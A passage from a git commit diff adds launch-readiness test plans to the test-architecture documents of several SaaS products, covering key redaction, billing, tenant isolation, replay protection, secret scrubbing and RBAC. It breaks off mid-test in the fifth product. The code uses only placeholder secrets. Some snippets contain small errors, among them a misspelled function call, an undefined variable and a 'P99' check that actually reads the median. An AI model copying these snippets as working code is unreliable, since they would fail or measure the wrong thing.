Implement BMad Must-Have Before Launch fixes for all 6 products

P1: API key redaction, SSE billing leak, token math edge cases, CI runner config P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
2026-03-01 02:14:04 +00:00
parent b24cfa7c0d
commit d038cd9c5c
6 changed files with 1305 additions and 0 deletions
--- a/products/01-llm-cost-router/test-architecture/test-architecture.md
+++ b/products/01-llm-cost-router/test-architecture/test-architecture.md
@@ -2551,3 +2551,167 @@ async fn panic_mode_allowed_for_owner_role() {
 ```
 *End of P1 Review Remediation Addendum*
 ---
 ## 12. BMad Review Implementation (Must-Have Before Launch)
 ### 12.1 API Key Redaction in Panic Traces
 ```rust
 // tests/security/key_redaction_test.rs
 #[test]
 fn panic_handler_redacts_bearer_tokens_from_stack_trace() {
    // Simulate a panic inside the proxy handler while processing a request
    // with Authorization: Bearer sk-live-abc123
    let result = std::panic::catch_unwind(|| {
        process_request_with_panic("Bearer sk-live-abc123");
    });
    assert!(result.is_err());
    // Capture the panic message
    let panic_msg = get_last_panic_message();
    assert!(!panic_msg.contains("sk-live-abc123"),
        "Panic trace contains raw API key!");
    assert!(panic_msg.contains("[REDACTED]") || !panic_msg.contains("sk-"));
 }
 #[test]
 fn error_log_redacts_provider_api_keys() {
    // Simulate an upstream error that includes the provider key in the response
    let error_body = r#"{"error": "Invalid API key: sk-proj-abc123xyz"}"#;
    let sanitized = redact_sensitive_fields(error_body);
    assert!(!sanitized.contains("sk-proj-abc123xyz"));
 }
 #[test]
 fn telemetry_event_never_contains_raw_api_key() {
    let event = create_telemetry_event("Bearer sk-live-secret", "gpt-4o", 100, 50);
    let serialized = serde_json::to_string(&event).unwrap();
    assert!(!serialized.contains("sk-live-secret"));
    assert!(!serialized.contains("Bearer"));
 }
 ```
 ### 12.2 SSE Billing Leak Prevention (Expanded)
 ```rust
 #[tokio::test]
 async fn sse_disconnect_bills_only_streamed_tokens() {
    let stack = E2EStack::start().await;
    let mock = stack.mock_provider();
    // Provider will stream 100 tokens at 1/sec
    mock.configure_slow_stream(100, Duration::from_millis(100));
    // Client reads 10 tokens then disconnects
    let mut stream = stack.proxy_stream(&chat_request_streaming()).await;
    let mut received = 0;
    while let Some(chunk) = stream.next().await {
        received += count_tokens_in_chunk(&chunk);
        if received >= 10 { break; }
    }
    drop(stream);
    tokio::time::sleep(Duration::from_millis(500)).await;
    // Billing must reflect only streamed tokens
    let usage = stack.get_last_usage_record().await;
    assert!(usage.completion_tokens <= 15, // small buffer for in-flight
        "Billed {} tokens but only streamed ~10", usage.completion_tokens);
    // Provider connection must be aborted
    assert_eq!(mock.active_connections(), 0);
 }
 #[tokio::test]
 async fn sse_disconnect_during_prompt_processing_bills_zero_completion() {
    // Client disconnects before any completion tokens are generated
    // (provider is still processing the prompt)
    let stack = E2EStack::start().await;
    let mock = stack.mock_provider();
    mock.configure_delay_before_first_token(Duration::from_secs(5));
    let stream = stack.proxy_stream(&chat_request_streaming()).await;
    tokio::time::sleep(Duration::from_millis(100)).await;
    drop(stream); // Disconnect before first token
    let usage = stack.get_last_usage_record().await;
    assert_eq!(usage.completion_tokens, 0);
    // Prompt tokens may still be billed (provider processed them)
 }
 ```
 ### 12.3 Token Calculation Edge Cases
 ```rust
 #[test]
 fn tokenizer_handles_unicode_emoji_correctly() {
    // cl100k_base tokenizes emoji differently than ASCII
    let text = "Hello 🌍🔥 world";
    let tokens = count_tokens_cl100k(text);
    assert!(tokens > 3); // Emoji take multiple tokens
 }
 #[test]
 fn tokenizer_handles_cjk_characters() {
    let text = "你好世界";
    let tokens = count_tokens_cl100k(text);
    assert!(tokens >= 4); // Each CJK char is typically 1+ tokens
 }
 #[test]
 fn cost_calculation_matches_provider_billing() {
    // Property test: our token count * rate must match what the provider reports
    // within a 1% tolerance (tokenizer version differences)
    fc::assert(fc::property(
        fc::string_of(fc::any::<char>(), 1..1000),
        |text| {
            let our_count = count_tokens_cl100k(&text);
            let provider_count = mock_provider_token_count(&text);
            let diff = (our_count as f64 - provider_count as f64).abs();
            diff / provider_count as f64 <= 0.01
        }
    ));
 }
 #[test]
 fn anthropic_tokenizer_differs_from_openai() {
    // Same text, different token counts — billing must use the correct tokenizer
    let text = "The quick brown fox jumps over the lazy dog";
    let openai_tokens = count_tokens_cl100k(text);
    let anthropic_tokens = count_tokens_claude(text);
    // They WILL differ — verify we use the right one per provider
    assert_ne!(openai_tokens, anthropic_tokens);
 }
 ```
 ### 12.4 Dedicated CI Runner for Latency Benchmarks
 ```yaml
 # .github/workflows/benchmark.yml
 # Runs on self-hosted runner (Brian's NAS) — not shared GitHub Actions
 name: Latency Benchmark
 on:
  push:
    branches: [main]
    paths: ['src/proxy/**']
 jobs:
  benchmark:
    runs-on: self-hosted  # Brian's NAS with consistent CPU
    steps:
      - uses: actions/checkout@v4
      - name: Run proxy latency benchmark
        run: cargo bench --bench proxy_latency
      - name: Assert P99 < 5ms
        run: |
          P99=$(cat target/criterion/proxy_overhead/new/estimates.json | jq '.median.point_estimate')
          if (( $(echo "$P99 > 5000000" | bc -l) )); then
            echo "P99 latency ${P99}ns exceeds 5ms budget"
            exit 1
          fi
 ```
 *End of P1 BMad Implementation*
--- a/products/02-iac-drift-detection/test-architecture/test-architecture.md
+++ b/products/02-iac-drift-detection/test-architecture/test-architecture.md
@@ -2094,3 +2094,208 @@ Per review recommendation, cap E2E at 10 critical paths. Remaining 40 tests push
 | E2E/Smoke | 10% (~50) | 7% (~35) | Capped at 10 true E2E + 25 Playwright UI tests |
 *End of P2 Review Remediation Addendum*
 ---
 ## 12. BMad Review Implementation (Must-Have Before Launch)
 ### 12.1 mTLS Revocation — Instant Lockout
 ```go
 // tests/integration/mtls_revocation_test.go
 func TestRevokedCert_ExistingConnectionDropped(t *testing.T) {
    // 1. Agent connects with valid cert
    agent := connectAgentWithCert(t, validCert)
    assert.True(t, agent.IsConnected())
    // 2. Revoke the cert via CRL update
    revokeCert(t, validCert.SerialNumber)
    // 3. Force CRL refresh on SaaS (< 30 seconds)
    triggerCRLRefresh(t)
    // 4. Existing connection must be terminated
    time.Sleep(5 * time.Second)
    assert.False(t, agent.IsConnected(),
        "Revoked agent still has active mTLS connection — cached session not cleared")
 }
 func TestRevokedCert_NewConnectionRejected(t *testing.T) {
    revokeCert(t, validCert.SerialNumber)
    triggerCRLRefresh(t)
    _, err := connectAgentWithCert(t, validCert)
    assert.Error(t, err)
    assert.Contains(t, err.Error(), "certificate revoked")
 }
 func TestPayloadReplay_RejectedByNonce(t *testing.T) {
    // Capture a legitimate drift report
    report := captureValidDriftReport(t)
    // Replay it
    resp := postDriftReport(t, report)
    assert.Equal(t, 409, resp.StatusCode) // Conflict — nonce already used
 }
 ```
 ### 12.2 Terraform State Lock Recovery on Panic
 ```go
 // tests/integration/remediation_panic_test.go
 func TestPanicMode_ReleasesTerraformStateLock(t *testing.T) {
    // 1. Start a remediation (terraform apply)
    execID := startRemediation(t, "stack-1", "drift-1")
    waitForState(t, execID, "applying")
    // 2. Verify state lock is held
    lockInfo := getTerraformStateLock(t, "stack-1")
    assert.NotNil(t, lockInfo, "State lock should be held during apply")
    // 3. Trigger panic mode
    triggerPanicMode(t)
    // 4. Wait for agent to abort
    waitForState(t, execID, "aborted")
    // 5. State lock MUST be released
    lockInfo = getTerraformStateLock(t, "stack-1")
    assert.Nil(t, lockInfo,
        "Terraform state lock not released after panic — infrastructure is now in zombie state")
 }
 func TestPanicMode_AgentRunsTerraformForceUnlock(t *testing.T) {
    // If normal unlock fails, agent must run `terraform force-unlock`
    startRemediation(t, "stack-1", "drift-1")
    waitForState(t, execID, "applying")
    // Simulate lock that can't be released normally
    corruptStateLock(t, "stack-1")
    triggerPanicMode(t)
    // Agent should attempt force-unlock
    logs := getAgentLogs(t)
    assert.Contains(t, logs, "terraform force-unlock")
 }
 ```
 ### 12.3 RLS Connection Pool Leak Test
 ```go
 // tests/integration/rls_pool_leak_test.go
 func TestPgBouncer_ClearsTenantContext_BetweenRequests(t *testing.T) {
    t.Parallel()
    // 1. Request as Tenant A — sets SET LOCAL app.tenant_id = 'tenant-a'
    respA := apiRequest(t, tenantAToken, "GET", "/v1/stacks")
    assert.Equal(t, 200, respA.StatusCode)
    stacksA := parseStacks(respA)
    // 2. Immediately request as Tenant B on same PgBouncer connection
    respB := apiRequest(t, tenantBToken, "GET", "/v1/stacks")
    assert.Equal(t, 200, respB.StatusCode)
    stacksB := parseStacks(respB)
    // 3. Tenant B must NOT see Tenant A's stacks
    for _, stack := range stacksB {
        assert.NotEqual(t, "tenant-a", stack.TenantID,
            "CRITICAL: Tenant B received Tenant A's data — PgBouncer leaked context")
    }
 }
 func TestRLS_100ConcurrentTenants_NoLeakage(t *testing.T) {
    // Stress test: 100 concurrent requests from different tenants
    var wg sync.WaitGroup
    violations := make(chan string, 100)
    for i := 0; i < 100; i++ {
        wg.Add(1)
        go func(tenantID string) {
            defer wg.Done()
            token := createTenantToken(t, tenantID)
            resp := apiRequest(t, token, "GET", "/v1/stacks")
            stacks := parseStacks(resp)
            for _, s := range stacks {
                if s.TenantID != tenantID {
                    violations <- fmt.Sprintf("Tenant %s saw data from %s", tenantID, s.TenantID)
                }
            }
        }(fmt.Sprintf("tenant-%d", i))
    }
    wg.Wait()
    close(violations)
    for v := range violations {
        t.Fatal("CROSS-TENANT LEAK:", v)
    }
 }
 ```
 ### 12.4 Secret Scrubber Entropy Scanning
 ```go
 // pkg/agent/scrubber/entropy_test.go
 func TestEntropyScan_DetectsBase64EncodedAWSKey(t *testing.T) {
    // AWS key base64-encoded inside a JSON block
    input := `{"config": "` + base64.StdEncoding.EncodeToString([]byte("AKIAIOSFODNN7EXAMPLE")) + `"}`
    result := scrubber.Scrub(input)
    assert.NotContains(t, result, "AKIAIOSFODNN7EXAMPLE")
 }
 func TestEntropyScan_DetectsMultiLineRSAKey(t *testing.T) {
    input := `-----BEGIN RSA PRIVATE KEY-----
 MIIEpAIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy5AhJPnUfGqlTlGa...
 -----END RSA PRIVATE KEY-----`
    result := scrubber.Scrub(input)
    assert.Contains(t, result, "[REDACTED RSA KEY]")
 }
 func TestEntropyScan_DetectsHighEntropyCustomToken(t *testing.T) {
    // 40-char hex string that looks like a custom API token
    token := "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"
    input := fmt.Sprintf(`{"api_token": "%s"}`, token)
    result := scrubber.Scrub(input)
    // Shannon entropy > 3.5 bits/char should trigger redaction
    assert.NotContains(t, result, token)
 }
 func TestEntropyScan_DoesNotRedactNormalText(t *testing.T) {
    input := `{"message": "Hello world, this is a normal log message"}`
    result := scrubber.Scrub(input)
    assert.Equal(t, input, result) // No false positives
 }
 ```
 ### 12.5 pgmq Visibility Timeout for Long Scans
 ```go
 // tests/integration/pgmq_visibility_test.go
 func TestPgmq_LongScan_DoesNotTriggerDuplicateProcessing(t *testing.T) {
    // Simulate a scan that takes 5 minutes
    queue := setupPgmqQueue(t)
    // Enqueue a drift report
    queue.Send(t, makeDriftReport("stack-1"))
    // Consumer 1 picks it up with 2-minute visibility timeout
    msg := queue.Read(t, 120) // 120s visibility
    assert.NotNil(t, msg)
    // Simulate long processing (extend visibility)
    for i := 0; i < 3; i++ {
        time.Sleep(90 * time.Second)
        queue.ExtendVisibility(t, msg.ID, 120) // Extend by another 2 min
    }
    // Consumer 2 should NOT get the same message
    msg2 := queue.Read(t, 120)
    assert.Nil(t, msg2, "pgmq handed job to second worker while first was still processing")
 }
 ```
 *End of P2 BMad Implementation*
--- a/products/03-alert-intelligence/test-architecture/test-architecture.md
+++ b/products/03-alert-intelligence/test-architecture/test-architecture.md
@@ -1865,3 +1865,227 @@ describe('Slack Notification Circuit Breaker', () => {
 | E2E | 10% (~20) | 10% (~28) | Dashboard UI (Playwright), onboarding flow |
 *End of P3 Review Remediation Addendum*
 ---
 ## 12. BMad Review Implementation (Must-Have Before Launch)
 ### 12.1 HMAC Timestamp Freshness (Replay Attack Prevention)
 ```typescript
 describe('HMAC Replay Attack Prevention', () => {
  it('rejects Datadog webhook with timestamp older than 5 minutes', async () => {
    const payload = makeDatadogPayload();
    const staleTimestamp = Math.floor(Date.now() / 1000) - 301; // 5min + 1s
    const sig = computeDatadogHMAC(payload, staleTimestamp);
    const resp = await ingest(payload, {
      'dd-webhook-timestamp': staleTimestamp.toString(),
      'dd-webhook-signature': sig,
    });
    expect(resp.status).toBe(401);
    expect(resp.body.error).toContain('stale timestamp');
  });
  it('rejects PagerDuty webhook with missing timestamp', async () => {
    const payload = makePagerDutyPayload();
    const sig = computePagerDutyHMAC(payload);
    const resp = await ingest(payload, {
      'x-pagerduty-signature': sig,
      // No timestamp header
    });
    expect(resp.status).toBe(401);
  });
  it('rejects OpsGenie webhook replayed after 5 minutes', async () => {
    // OpsGenie doesn't always package timestamp cleanly
    // Must extract from payload body and validate
    const payload = makeOpsGeniePayload({ timestamp: fiveMinutesAgo() });
    const sig = computeOpsGenieHMAC(payload);
    const resp = await ingest(payload, { 'x-opsgenie-signature': sig });
    expect(resp.status).toBe(401);
  });
  it('accepts fresh webhook within 5-minute window', async () => {
    const payload = makeDatadogPayload();
    const freshTimestamp = Math.floor(Date.now() / 1000);
    const sig = computeDatadogHMAC(payload, freshTimestamp);
    const resp = await ingest(payload, {
      'dd-webhook-timestamp': freshTimestamp.toString(),
      'dd-webhook-signature': sig,
    });
    expect(resp.status).toBe(200);
  });
 });
 ```
 ### 12.2 Cross-Tenant Negative Isolation Tests
 ```typescript
 describe('DynamoDB Tenant Isolation (Negative Tests)', () => {
  it('Tenant A cannot read Tenant B incidents', async () => {
    // Seed data for both tenants
    await createIncident('tenant-a', { title: 'A incident' });
    await createIncident('tenant-b', { title: 'B incident' });
    // Query as Tenant A
    const results = await dao.listIncidents('tenant-a');
    // Explicitly assert Tenant B data is absent
    const tenantIds = results.map(r => r.tenantId);
    expect(tenantIds).not.toContain('tenant-b');
    expect(results.every(r => r.tenantId === 'tenant-a')).toBe(true);
  });
  it('Tenant A cannot read Tenant B analytics', async () => {
    await seedAnalytics('tenant-a', { alertCount: 100 });
    await seedAnalytics('tenant-b', { alertCount: 200 });
    const analytics = await dao.getAnalytics('tenant-a');
    expect(analytics.alertCount).toBe(100); // Not 300 (combined)
  });
  it('API returns 404 (not 403) for cross-tenant incident access', async () => {
    const incident = await createIncident('tenant-b', { title: 'secret' });
    const resp = await api.get(`/v1/incidents/${incident.id}`)
      .set('Authorization', `Bearer ${tenantAToken}`);
    // 404 not 403 — don't leak existence
    expect(resp.status).toBe(404);
  });
 });
 ```
 ### 12.3 Correlation Window Edge Cases
 ```typescript
 describe('Out-of-Order Alert Delivery', () => {
  it('late alert attaches to existing incident (not duplicate)', async () => {
    const clock = new FakeClock();
    const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
    // Alert 1 arrives at T=0
    const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 0 });
    const incident1 = await engine.process(alert1);
    // Window closes at T=5min, incident shipped
    clock.advanceBy(5 * 60 * 1000);
    await engine.flushWindows();
    // Late alert arrives at T=6min with timestamp T=2min (within original window)
    const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high', timestamp: 2 * 60 * 1000 });
    const result = await engine.process(lateAlert);
    // Must attach to existing incident, not create new one
    expect(result.incidentId).toBe(incident1.incidentId);
    expect(result.action).toBe('attached_to_existing');
  });
  it('very late alert (>2x window) creates new incident', async () => {
    const clock = new FakeClock();
    const engine = new CorrelationEngine(new InMemoryWindowStore(), clock);
    const alert1 = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
    const incident1 = await engine.process(alert1);
    // 15 minutes later (3x the 5-min window)
    clock.advanceBy(15 * 60 * 1000);
    const lateAlert = makeAlert({ service: 'auth', fingerprint: 'cpu-high' });
    const result = await engine.process(lateAlert);
    expect(result.incidentId).not.toBe(incident1.incidentId);
    expect(result.action).toBe('new_incident');
  });
 });
 ```
 ### 12.4 SQS Claim-Check Round-Trip
 ```typescript
 describe('SQS 256KB Claim-Check End-to-End', () => {
  it('large payload round-trips through S3 pointer', async () => {
    const largePayload = makeLargeAlertPayload(300 * 1024); // 300KB
    // Ingestion compresses and stores in S3
    const resp = await ingest(largePayload);
    expect(resp.status).toBe(200);
    // SQS message contains S3 pointer
    const sqsMsg = await getLastSQSMessage(localstack, 'alert-queue');
    const body = JSON.parse(sqsMsg.Body);
    expect(body.s3Pointer).toBeDefined();
    // Correlation engine fetches from S3 and processes
    const incident = await waitForIncidentCreated(5000);
    expect(incident).toBeDefined();
    expect(incident.sourceAlertCount).toBeGreaterThan(0);
  });
  it('S3 fetch timeout does not crash correlation engine', async () => {
    // Inject S3 latency (10 second delay)
    mockS3.setLatency(10000);
    const largePayload = makeLargeAlertPayload(300 * 1024);
    await ingest(largePayload);
    // Correlation engine should timeout and send to DLQ
    const dlqMsg = await getDLQMessage(localstack, 'alert-dlq', 15000);
    expect(dlqMsg).toBeDefined();
    // Engine is still healthy
    const health = await api.get('/health');
    expect(health.status).toBe(200);
  });
 });
 ```
 ### 12.5 Free Tier Enforcement
 ```typescript
 describe('Free Tier (10K alerts/month, 7-day retention)', () => {
  it('accepts alert at 9,999 count', async () => {
    await setAlertCounter('tenant-free', 9999);
    const resp = await ingestAsTenat('tenant-free', makeAlert());
    expect(resp.status).toBe(200);
  });
  it('rejects alert at 10,001 with upgrade prompt', async () => {
    await setAlertCounter('tenant-free', 10000);
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(429);
    expect(resp.body.upgrade_url).toContain('stripe');
  });
  it('counter resets on first of month', async () => {
    await setAlertCounter('tenant-free', 10000);
    clock.advanceToFirstOfNextMonth();
    await runMonthlyReset();
    const resp = await ingestAsTenant('tenant-free', makeAlert());
    expect(resp.status).toBe(200);
  });
  it('purges data older than 7 days on free tier', async () => {
    await createIncident('tenant-free', { createdAt: eightDaysAgo() });
    await runRetentionPurge();
    const incidents = await dao.listIncidents('tenant-free');
    expect(incidents).toHaveLength(0);
  });
  it('retains data for 90 days on pro tier', async () => {
    await createIncident('tenant-pro', { createdAt: thirtyDaysAgo() });
    await runRetentionPurge();
    const incidents = await dao.listIncidents('tenant-pro');
    expect(incidents).toHaveLength(1);
  });
 });
 ```
 *End of P3 BMad Implementation*
--- a/products/04-lightweight-idp/test-architecture/test-architecture.md
+++ b/products/04-lightweight-idp/test-architecture/test-architecture.md
@@ -1265,3 +1265,225 @@ def test_meilisearch_index_rebuild_does_not_drop_search():
    # Verify zero-downtime index swapping during mapping updates
    pass
 ```
 ---
 ## 12. BMad Review Implementation (Must-Have Before Launch)
 ### 12.1 Discovery Scan Timeout / Partial Failure Recovery
 ```python
 # tests/integration/test_discovery_resilience.py
 def test_partial_aws_scan_does_not_delete_existing_services():
    """If AWS scanner times out after discovering 500 of 1000 resources,
    existing catalog entries must NOT be marked stale or deleted."""
    # Seed catalog with 1000 services
    seed_catalog(count=1000)
    # Simulate scanner timeout after 500 resources
    with mock_aws_timeout_after(500):
        result = run_aws_discovery_scan()
    assert result.status == "partial_failure"
    assert result.discovered == 500
    # All 1000 services must still exist in catalog
    services = catalog_api.list_services()
    assert len(services) == 1000  # NOT 500
    # Partial results should be staged, not committed
    staged = catalog_api.list_staged_updates()
    assert len(staged) == 500
 def test_partial_github_scan_does_not_corrupt_ownership():
    """If GitHub scanner hits rate limit mid-scan, existing ownership
    mappings must be preserved."""
    seed_catalog_with_ownership(count=100)
    with mock_github_rate_limit_after(50):
        result = run_github_discovery_scan()
    assert result.status == "partial_failure"
    # All 100 ownership mappings intact
    services = catalog_api.list_services()
    owned = [s for s in services if s.owner is not None]
    assert len(owned) == 100  # NOT 50
 def test_scan_failure_triggers_alert_not_silent_failure():
    result = run_aws_discovery_scan_with_invalid_credentials()
    assert result.status == "failed"
    # Must alert the admin
    alerts = get_admin_alerts()
    assert any("discovery scan failed" in a.message for a in alerts)
 ```
 ### 12.2 Ownership Conflict Resolution Integration Test
 ```python
 # tests/integration/test_ownership_conflict.py
 def test_explicit_config_overrides_implicit_tag():
    """Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits)"""
    # AWS tag says owner is "team-infra"
    aws_scanner.discover_service("auth-api", owner_tag="team-infra")
    # GitHub CODEOWNERS says owner is "team-platform"
    github_scanner.discover_service("auth-api", codeowners="team-platform")
    # Resolve conflict
    service = catalog_api.get_service("auth-api")
    assert service.owner == "team-platform"  # Explicit wins
    assert service.owner_source == "codeowners"
 def test_concurrent_discovery_sources_do_not_race():
    """Two scanners discovering the same service simultaneously
    must not create duplicate entries."""
    import asyncio
    async def run_both():
        await asyncio.gather(
            aws_scanner.discover_service_async("billing-api"),
            github_scanner.discover_service_async("billing-api"),
        )
    asyncio.run(run_both())
    services = catalog_api.search("billing-api")
    assert len(services) == 1  # No duplicates
 def test_heuristic_ownership_does_not_override_explicit():
    # Explicit owner set via config
    catalog_api.set_owner("auth-api", "team-platform", source="config")
    # Heuristic scanner infers different owner from commit history
    github_scanner.infer_ownership("auth-api", top_committer="dev@other-team.com")
    service = catalog_api.get_service("auth-api")
    assert service.owner == "team-platform"  # Explicit preserved
 ```
 ### 12.3 VCR Cassette Freshness Validation
 ```yaml
 # .github/workflows/vcr-refresh.yml
 # Weekly job to re-record VCR cassettes against real AWS
 name: VCR Cassette Freshness
 on:
  schedule:
    - cron: '0 6 * * 1'  # Every Monday 6 AM UTC
 jobs:
  refresh:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v4
      - name: Re-record cassettes
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.VCR_AWS_KEY }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.VCR_AWS_SECRET }}
        run: |
          VCR_RECORD=all pytest tests/integration/scanners/ -v
      - name: Diff cassettes
        run: |
          git diff --stat tests/cassettes/
          CHANGED=$(git diff --name-only tests/cassettes/ | wc -l)
          if [ "$CHANGED" -gt 0 ]; then
            echo "⚠️ $CHANGED cassettes changed — AWS API responses have drifted"
            echo "Review and commit updated cassettes"
          fi
      - name: Create PR if cassettes changed
        uses: peter-evans/create-pull-request@v6
        with:
          title: "chore: refresh VCR cassettes (AWS API drift)"
          branch: vcr-refresh
 ```
 ### 12.4 Meilisearch Zero-Downtime Index Rebuild
 ```python
 # tests/integration/test_meilisearch_rebuild.py
 def test_search_returns_results_during_index_rebuild():
    """Cmd+K search must work during index rebuild (zero downtime)."""
    # Seed index with 100 services
    meili.index("services").add_documents(make_services(100))
    meili.index("services").wait_for_pending_update()
    # Start rebuild (creates services_v2, swaps when ready)
    rebuild_task = start_index_rebuild()
    # Search must still work during rebuild
    results = meili.index("services").search("auth")
    assert len(results["hits"]) > 0
    # Wait for rebuild to complete
    rebuild_task.wait()
    # Search still works after swap
    results = meili.index("services").search("auth")
    assert len(results["hits"]) > 0
 def test_index_rebuild_failure_does_not_corrupt_active_index():
    meili.index("services").add_documents(make_services(50))
    # Simulate rebuild failure (e.g., OOM during indexing)
    with mock_meili_oom_during_rebuild():
        result = start_index_rebuild()
    assert result.status == "failed"
    # Active index must be untouched
    results = meili.index("services").search("billing")
    assert len(results["hits"]) > 0  # Still works
 ```
 ### 12.5 Cmd+K Search Latency from Redis Cache
 ```python
 # tests/performance/test_search_latency.py
 def test_cmd_k_search_under_10ms_from_redis():
    """Prefix cache hit must return in <10ms."""
    # Warm the cache
    redis_client.set("search:prefix:auth", json.dumps([
        {"name": "auth-service", "owner": "team-platform"},
        {"name": "auth-proxy", "owner": "team-infra"},
    ]))
    import time
    start = time.perf_counter_ns()
    results = search_api.prefix_search("auth")
    elapsed_ms = (time.perf_counter_ns() - start) / 1_000_000
    assert elapsed_ms < 10, f"Cmd+K search took {elapsed_ms:.1f}ms — exceeds 10ms SLA"
    assert len(results) == 2
 ```
 ### 12.6 Free Tier Enforcement (50 Services)
 ```python
 def test_free_tier_allows_50_services():
    tenant = create_tenant(tier="free")
    for i in range(50):
        resp = catalog_api.create_service(tenant, f"service-{i}")
        assert resp.status_code == 201
 def test_free_tier_rejects_51st_service():
    tenant = create_tenant(tier="free")
    seed_services(tenant, count=50)
    resp = catalog_api.create_service(tenant, "service-51")
    assert resp.status_code == 403
    assert "upgrade" in resp.json()["error"].lower()
 ```
 *End of P4 BMad Implementation*
--- a/products/05-aws-cost-anomaly/test-architecture/test-architecture.md
+++ b/products/05-aws-cost-anomaly/test-architecture/test-architecture.md
@@ -710,3 +710,198 @@ export const makeBaseline = (overrides) => ({
   - CDK definitions, LocalStack event injection, wire everything together.
 *End of dd0c/cost Test Architecture (v2)*
 ---
 ## 12. BMad Review Implementation (Must-Have Before Launch)
 ### 12.1 Concurrent Baseline Update Conflict Test
 ```typescript
 describe('Concurrent Baseline Updates (DynamoDB TransactWriteItem)', () => {
  it('two simultaneous Lambda invocations converge to correct baseline', async () => {
    // Seed baseline: mean=1.00, stddev=0.10, count=20
    await seedBaseline('tenant-1', 'ec2/m5.xlarge', { mean: 1.00, stddev: 0.10, count: 20 });
    // Two events arrive simultaneously for the same resource type
    const event1 = makeCostEvent({ hourlyCost: 1.50 });
    const event2 = makeCostEvent({ hourlyCost: 2.00 });
    // Process concurrently
    const [result1, result2] = await Promise.allSettled([
      processEvent('tenant-1', 'ec2/m5.xlarge', event1),
      processEvent('tenant-1', 'ec2/m5.xlarge', event2),
    ]);
    // One succeeds, one retries via ConditionalCheckFailed
    const successes = [result1, result2].filter(r => r.status === 'fulfilled');
    expect(successes.length).toBe(2); // Both eventually succeed
    // Final baseline must reflect BOTH events
    const baseline = await getBaseline('tenant-1', 'ec2/m5.xlarge');
    expect(baseline.count).toBe(22); // 20 + 2
    // Mean should be updated by both observations (order doesn't matter for Welford)
  });
  it('ConditionalCheckFailed triggers retry with fresh baseline read', async () => {
    const spy = vi.spyOn(dynamoClient, 'transactWriteItems');
    // Force a conflict on first attempt
    mockConflictOnce();
    await processEvent('tenant-1', 'ec2/m5.xlarge', makeCostEvent({ hourlyCost: 3.00 }));
    // Should have been called twice (initial + retry)
    expect(spy).toHaveBeenCalledTimes(2);
  });
 });
 ```
 ### 12.2 Remediation RBAC
 ```typescript
 describe('Remediation Authorization', () => {
  it('only account owners can click Stop Instance', async () => {
    const ownerAction = makeSlackAction('stop_instance', { userId: 'U_OWNER' });
    const resp = await handleSlackAction(ownerAction);
    expect(resp.status).toBe(200);
  });
  it('viewer role cannot trigger remediation', async () => {
    const viewerAction = makeSlackAction('stop_instance', { userId: 'U_VIEWER' });
    const resp = await handleSlackAction(viewerAction);
    expect(resp.status).toBe(403);
    expect(resp.body.error).toContain('insufficient permissions');
  });
  it('user from different Slack workspace cannot trigger remediation', async () => {
    const foreignAction = makeSlackAction('stop_instance', { 
      userId: 'U_FOREIGN', 
      teamId: 'T_OTHER_WORKSPACE' 
    });
    const resp = await handleSlackAction(foreignAction);
    expect(resp.status).toBe(403);
  });
  it('snooze and mark-expected are allowed for all authenticated users', async () => {
    const viewerSnooze = makeSlackAction('snooze_24h', { userId: 'U_VIEWER' });
    const resp = await handleSlackAction(viewerSnooze);
    expect(resp.status).toBe(200);
  });
 });
 ```
 ### 12.3 Clock Interface for Governance Tests
 ```typescript
 // src/governance/clock.ts
 interface Clock {
  now(): number;
  advanceBy(ms: number): void;
 }
 class FakeClock implements Clock {
  private current: number;
  constructor(start = Date.now()) { this.current = start; }
  now() { return this.current; }
  advanceBy(ms: number) { this.current += ms; }
 }
 describe('14-Day Auto-Promotion (Clock-Injected)', () => {
  let clock: FakeClock;
  let governance: GovernanceEngine;
  beforeEach(() => {
    clock = new FakeClock(new Date('2026-03-01').getTime());
    governance = new GovernanceEngine(clock);
  });
  it('does not promote at day 13', () => {
    clock.advanceBy(13 * 24 * 60 * 60 * 1000);
    const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
    expect(result.promoted).toBe(false);
  });
  it('promotes at day 15 with low FP rate', () => {
    clock.advanceBy(15 * 24 * 60 * 60 * 1000);
    const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.05 });
    expect(result.promoted).toBe(true);
    expect(result.newMode).toBe('audit');
  });
  it('does not promote at day 15 with high FP rate', () => {
    clock.advanceBy(15 * 24 * 60 * 60 * 1000);
    const result = governance.evaluatePromotion('tenant-1', { fpRate: 0.15 });
    expect(result.promoted).toBe(false);
    expect(result.reason).toContain('false-positive rate');
  });
 });
 ```
 ### 12.4 Property-Based Tests with 10K Runs
 ```typescript
 describe('Anomaly Scorer (fast-check, 10K runs)', () => {
  it('score is always between 0 and 100', () => {
    fc.assert(
      fc.property(
        fc.record({
          cost: fc.float({ min: 0, max: 10000, noNaN: true }),
          mean: fc.float({ min: 0, max: 10000, noNaN: true }),
          stddev: fc.float({ min: 0, max: 1000, noNaN: true }),
        }),
        (input) => {
          const score = scorer.score(input);
          return score >= 0 && score <= 100;
        }
      ),
      { numRuns: 10000, seed: 42 } // Reproducible
    );
  });
  it('score monotonically increases as cost increases', () => {
    fc.assert(
      fc.property(
        fc.float({ min: 0, max: 100, noNaN: true }),
        fc.float({ min: 0, max: 100, noNaN: true }),
        fc.float({ min: 0.01, max: 50, noNaN: true }),
        (costA, costB, stddev) => {
          const baseline = { mean: 5.0, stddev };
